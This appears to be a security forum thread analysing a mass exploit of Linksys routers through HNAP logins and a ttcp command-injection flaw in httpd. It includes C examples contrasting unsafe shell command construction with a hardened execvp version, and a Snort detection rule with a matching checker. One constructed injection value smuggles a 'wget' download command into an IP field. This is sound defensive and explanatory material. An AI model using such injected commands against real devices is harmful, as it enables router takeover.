I am withholding the full URL for now until I can figure out if there is a patch or if this is a public/known exploit. I hope that password mentioned isn't another case of hard-coded credentials to debug stuff on the router.

The port appears to change but is always

The binary also includes a couple of images (thanks Peter for pointing that out).

The initial HNAP technique is described here: it looks like they snag the credentials in the initial attempt and then post back with those credentials on the second request, causing the second stage to be executed. https://edu/forums/diary/Suspected Mass Exploit Against Linksys E1000 E1200 Routers/17621/1#29684

I believe the second stage is using a technique described in a blog post by one of my co-workers back in March of 2013...

Short summary:
- all user agents match your list
- oldest hit was in August 2013 (previous hits in July didn't use the "admin" password)
- Linksys models involved in the scanning include not only E1000 and E1200, but also E1500, E2500, E3200 and E4200 (full list with firmware versions

Cmd line injection vulnerability seems to go back a long ways.
epi_ttcp is being called by /usr/sbin/httpd without checking/validating the parameters being passed:

"epi_ttcp -tsufm -l %s -n %s %s &", ttcp_size, ttcp_num, ttcp_ip

So it's a similar issue to what was disclosed in May 2013, but instead of exploiting a problem with the ping test part of the code, it's in the ttcp section in the Start_epi function inside httpd.
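Added example (my own illustration, not code from the Linksys firmware or from the poster above): the command construction the post describes, in its unsafe form next to a hardened one. It assumes httpd builds the line with snprintf() and runs it through system(); the field names ttcp_size, ttcp_num and ttcp_ip come from the post, the function names are hypothetical, and the "evil" value is constructed to show where the injection lands.

```c
/* Added example, not code from the Linksys firmware or from anyone in this
 * thread. Assumes httpd does snprintf() + system() on the format string quoted
 * in the post; function names are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <arpa/inet.h>

/* Unsafe form: the three POST fields are spliced verbatim into a line that a
 * shell will parse, so any ';', '|', '`' or '$(' in them gets executed. */
static int build_ttcp_cmd_unsafe(char *out, size_t outlen,
                                 const char *ttcp_size, const char *ttcp_num,
                                 const char *ttcp_ip)
{
    int n = snprintf(out, outlen, "epi_ttcp -tsufm -l %s -n %s %s &",
                     ttcp_size, ttcp_num, ttcp_ip);
    /* ...and the vulnerable code would then do: system(out); */
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* 1 if s is 1..maxlen decimal digits, else 0. */
static int is_bounded_uint(const char *s, size_t maxlen)
{
    size_t len = strlen(s);
    if (len == 0 || len > maxlen)
        return 0;
    for (size_t i = 0; i < len; i++)
        if (!isdigit((unsigned char)s[i]))
            return 0;
    return 1;
}

/* 1 if s parses as a dotted-quad IPv4 address, else 0. */
static int is_ipv4(const char *s)
{
    struct in_addr a;
    return inet_pton(AF_INET, s, &a) == 1;
}

/* Hardened form: every field must pass an allow-list check, and the result is
 * an argv vector for execvp(), so no shell ever sees the values. argv_out
 * needs room for 8 pointers. Returns 0 on success, -1 if a field is rejected. */
static int build_ttcp_argv(char *argv_out[], const char *ttcp_size,
                           const char *ttcp_num, const char *ttcp_ip)
{
    if (!is_bounded_uint(ttcp_size, 7) || !is_bounded_uint(ttcp_num, 7) ||
        !is_ipv4(ttcp_ip))
        return -1;
    argv_out[0] = "epi_ttcp";
    argv_out[1] = "-tsufm";
    argv_out[2] = "-l";
    argv_out[3] = (char *)ttcp_size;
    argv_out[4] = "-n";
    argv_out[5] = (char *)ttcp_num;
    argv_out[6] = (char *)ttcp_ip;
    argv_out[7] = NULL;
    return 0;
}

/* Background execution without a shell (what the trailing "&" did): fork and
 * exec the argv directly. Returns the child pid, or -1 if fork() failed. */
pid_t spawn_nowait(char *const argv[])
{
    pid_t pid = fork();
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127); /* exec failed */
    }
    return pid;
}

int main(void)
{
    /* Constructed attacker value: a valid-looking IP followed by a second command. */
    const char *evil_ip = "192.168.1.2; wget http://10.0.0.1/x -O /tmp/x";
    char cmd[256];
    char *argv[8];

    build_ttcp_cmd_unsafe(cmd, sizeof cmd, "1024", "10", evil_ip);
    printf("shell would run: %s\n", cmd);

    printf("hardened rejects evil ip: %s\n",
           build_ttcp_argv(argv, "1024", "10", evil_ip) == -1 ? "yes" : "no");
    printf("hardened accepts clean ip: %s\n",
           build_ttcp_argv(argv, "1024", "10", "192.168.1.2") == 0 ? "yes" : "no");
    /* spawn_nowait(argv) would now run epi_ttcp with exactly those arguments. */
    return 0;
}
```

The point of the argv version is that validation alone is not what closes the hole; removing the shell from the path is. With execvp() the values can only ever reach epi_ttcp as its own arguments, so even a field the allow-list missed could not start a second process.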
I believe it's only for fingerprinting the model number.
@Anonymous From what I've seen, it's using the username "admin" and randomly generated password, not password "admin".
It shows up in the logs as the "\x80w\x01\x03\x01" string in apache web logs.

$HOME_NET $HTTP_PORTS (msg:"SERVER-WEBAPP HNAP admin brute force login attempt"; flow:established,to_server; content:"GET|20 2f|HNAP1|2f 20|HTTP|2f|1.1|0d 0a|"; fast_pattern:only; content:"Authorization|3a 20|Basic YWRtaW46"; http_header; metadata:policy balanced-ips drop, policy security-ips drop, ruleset community, service http; reference:url, classtype:bad-unknown; sid:10000112; rev:2;)

@claudijd Not the same thing; the password is included in the initial HNAP request and it seems to be randomly generated with each request (i.e.
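Added example (mine, not from any poster in this thread): the two content matches of the Snort rule above, implemented as a check over constructed HTTP requests, plus a decode of the Basic credential to show what the rule's "YWRtaW46" prefix is: base64("admin:"), i.e. username "admin" followed by whatever password the request carried, which is the "admin plus random password" pattern described a few comments up. The sample requests and the passwords in them are constructed, not captured traffic; function names are hypothetical.

```c
/* Added example, not part of the thread. Matches the rule's request-line and
 * Authorization-header content checks and decodes the credential. Sample
 * requests below are constructed; function names are hypothetical. */
#include <stdio.h>
#include <string.h>

/* Minimal base64 decoder: reads until NUL, '=', CR or LF. Returns the number
 * of bytes written, or -1 on an invalid character / too-small buffer. */
static int b64_decode(const char *in, unsigned char *out, size_t outlen)
{
    static const char tbl[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    unsigned acc = 0;
    int bits = 0;
    size_t n = 0;

    for (; *in && *in != '=' && *in != '\r' && *in != '\n'; in++) {
        const char *p = strchr(tbl, *in);
        if (!p)
            return -1;
        acc = (acc << 6) | (unsigned)(p - tbl);
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n >= outlen)
                return -1;
            out[n++] = (unsigned char)((acc >> bits) & 0xff);
        }
    }
    return (int)n;
}

/* 1 if req is "GET /HNAP1/ HTTP/1.1" carrying a Basic credential for user
 * "admin" (the rule's two content matches), else 0. On a match the decoded
 * password is copied into pw_out when pw_out is non-NULL. */
static int is_hnap_admin_login(const char *req, char *pw_out, size_t pwlen)
{
    static const char auth_prefix[] = "\r\nAuthorization: Basic ";
    const char *cred;
    unsigned char dec[256];
    int n;

    if (pw_out && pwlen)
        pw_out[0] = '\0';

    /* content:"GET|20 2f|HNAP1|2f 20|HTTP|2f|1.1|0d 0a|" : the request line */
    if (strncmp(req, "GET /HNAP1/ HTTP/1.1\r\n", 22) != 0)
        return 0;

    /* content:"Authorization|3a 20|Basic YWRtaW46"; http_header */
    cred = strstr(req, auth_prefix);
    if (!cred)
        return 0;
    cred += sizeof auth_prefix - 1;
    if (strncmp(cred, "YWRtaW46", 8) != 0) /* base64("admin:") */
        return 0;

    if (pw_out && pwlen) {
        n = b64_decode(cred, dec, sizeof dec - 1);
        if (n >= 6) {
            dec[n] = '\0';
            snprintf(pw_out, pwlen, "%s", (const char *)dec + 6); /* skip "admin:" */
        }
    }
    return 1;
}

/* Constructed sample requests (not captured traffic). The first credential is
 * base64("admin:x9Kq"), the second base64("root:x"). */
static const char REQ_ADMIN[] =
    "GET /HNAP1/ HTTP/1.1\r\n"
    "Host: 192.168.1.1\r\n"
    "Authorization: Basic YWRtaW46eDlLcQ==\r\n"
    "User-Agent: Mozilla/4.0\r\n\r\n";

static const char REQ_ROOT[] =
    "GET /HNAP1/ HTTP/1.1\r\n"
    "Host: 192.168.1.1\r\n"
    "Authorization: Basic cm9vdDp4\r\n\r\n";

static const char REQ_NOAUTH[] =
    "GET /HNAP1/ HTTP/1.1\r\n"
    "Host: 192.168.1.1\r\n\r\n";

int main(void)
{
    char pw[64];
    int hit = is_hnap_admin_login(REQ_ADMIN, pw, sizeof pw);
    printf("admin request: %d (password \"%s\")\n", hit, pw);
    printf("root request:  %d\n", is_hnap_admin_login(REQ_ROOT, NULL, 0));
    printf("no auth:       %d\n", is_hnap_admin_login(REQ_NOAUTH, NULL, 0));
    return 0;
}
```

Because "admin:" is six bytes, a multiple of three, its base64 encoding is exactly eight characters with no padding, which is why the rule can anchor on the fixed prefix "YWRtaW46" regardless of what password follows it.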